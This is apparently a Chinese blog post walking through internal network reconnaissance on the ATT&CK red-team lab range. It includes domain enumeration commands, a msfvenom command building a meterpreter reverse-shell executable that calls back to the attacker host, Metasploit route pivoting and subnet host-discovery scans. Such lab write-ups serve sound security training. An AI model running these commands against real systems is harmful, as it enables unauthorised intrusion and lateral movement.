靶机练习 - ATT&CK红队实战靶场 - 2. 内网信息收集
2023-02-18 16:42:07 时间
拿到win7的shell之后,执行下ipconfig,发现win7有两块网卡,外网ip为:192.168.174.135,内网ip为:192.168.52.143:
查看当前登录域及登录用户信息:net config Workstation
查看域成员:net view /domain:god。不知道为啥查看不了。。。
我们知道win7在一个名为god的域里,也知道了内网ip的网段,接下来找出该主机所在内网网段的其他存活主机。
1. 用msf生成木马传到win7上并执行该文件,得到msf的session:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.128 LPORT=4446 -f exe -o shell.exe
2. 配置静态路由:
run autoroute -s 192.168.52.0/24
3. 存活主机探测
试了一下,下面两种方法都可以
run auxiliary/scanner/netbios/nbname RHOSTS=192.168.52.0/24 run post/windows/gather/arp_scanner RHOSTS=192.168.52.0/24
找到两个存活主机:192.168.52.138(主机名为OWA)和192.168.52.141(GOD域上的主机名为ROOT-TVI862UBEH)
本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。
如需转载,请注明出处,这是对他人劳动成果的尊重。
相关文章
- Kubernetes微服务常见概念及应用
- REDIS 一个全栈DBA 不可缺的闭环, why not chose redis as primary database
- Redis高可用全景一览
- netty在真实项目里的应用
- Nginx系列(11)- web服务、代理,应用层负载均衡、应用层安全防护、 Nginx+Lua、动静分离
- Nginx系列(10)- Nginx配置文件详解
- Nginx系列(9)- Nginx常用命令
- Nginx系列(8)- Nginx安装 | Docker环境下部署
- Nginx系列(6)- nginx: [error] CreateFile() "D:\nginx-1.20.1/logs/nginx.pid" failed (2: The system cannot find the file specified)
- Nginx系列(5)- nginx: [emerg] bind() to 0.0.0.0:80 failed (10013: An attempt was made to access a socket in a way forbidden by its access permissions)
- Nginx系列(4)- Nginx安装 | Windows
- Nginx系列(3)- 负载均衡
- Nginx系列(2)- 正向代理和反向代理
- Nginx系列(1)- Nginx简介
- Dockers(29)- 网络连通
- Docker系列(28)- 自定义网络
- Docker系列(27)- 容器互联--link
- Docker系列(26)- 发布镜像到阿里云容器服务
- Docker系类(25)- 发布镜像到DockerHub
- Docker系列(24)- 实战:DockerFile制作tomcat镜像